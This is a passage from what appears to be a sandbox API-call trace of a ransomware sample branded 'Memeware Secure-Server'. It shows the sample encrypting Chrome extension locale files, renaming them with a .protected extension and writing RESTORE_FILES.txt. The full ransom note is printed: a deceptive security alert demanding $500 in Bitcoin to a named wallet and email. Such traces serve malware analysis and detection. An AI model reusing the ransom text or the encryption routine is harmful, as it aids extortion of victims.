lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.011] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.011] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.011] CloseHandle (hObject=0x164) returned 1 [0080.011] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs") returned 141 [0080.012] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0080.012] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*") returned 143 [0080.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.012] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.012] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\.") returned 143 [0080.012] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.012] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.012] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.012] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\..") returned 144 [0080.012] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.012] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.012] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0080.012] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.012] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.012] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.013] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.013] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.013] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.013] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.013] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0080.014] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.014] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0080.014] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.014] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.014] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.014] CloseHandle (hObject=0x168) returned 1 [0080.014] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.protected") returned 165 [0080.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.protected")) returned 1 [0080.015] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.015] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0080.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0080.015] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.015] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.016] lstrlenA (lpString="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") returned 684 [0080.016] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.016] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.016] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.016] CloseHandle (hObject=0x164) returned 1 [0080.016] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.016] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0080.016] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0080.016] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0080.016] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0080.016] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0080.016] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da") returned 141 [0080.016] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0080.016] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0080.016] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*") returned 143 [0080.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.016] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.016] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.017] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\.") returned 143 [0080.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.017] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.017] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.017] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.017] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.017] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\..") returned 144 [0080.017] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.017] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.017] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.017] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.017] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.017] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.017] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.017] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.018] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.018] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json") returned 155 [0080.018] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.018] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.019] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.019] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.019] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.019] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.019] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.020] CloseHandle (hObject=0x168) returned 1 [0080.020] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.protected") returned 165 [0080.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.protected")) returned 1 [0080.020] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.020] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.020] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0080.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.021] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.021] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.021] lstrlenA (lpString="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") returned 684 [0080.021] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.021] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.022] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.022] CloseHandle (hObject=0x164) returned 1 [0080.022] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.022] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0080.022] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0080.022] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0080.022] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0080.022] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0080.022] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de") returned 141 [0080.022] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0080.022] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0080.022] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*") returned 143 [0080.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.022] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.022] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.022] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.022] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.022] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.022] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\.") returned 143 [0080.022] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.022] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.022] 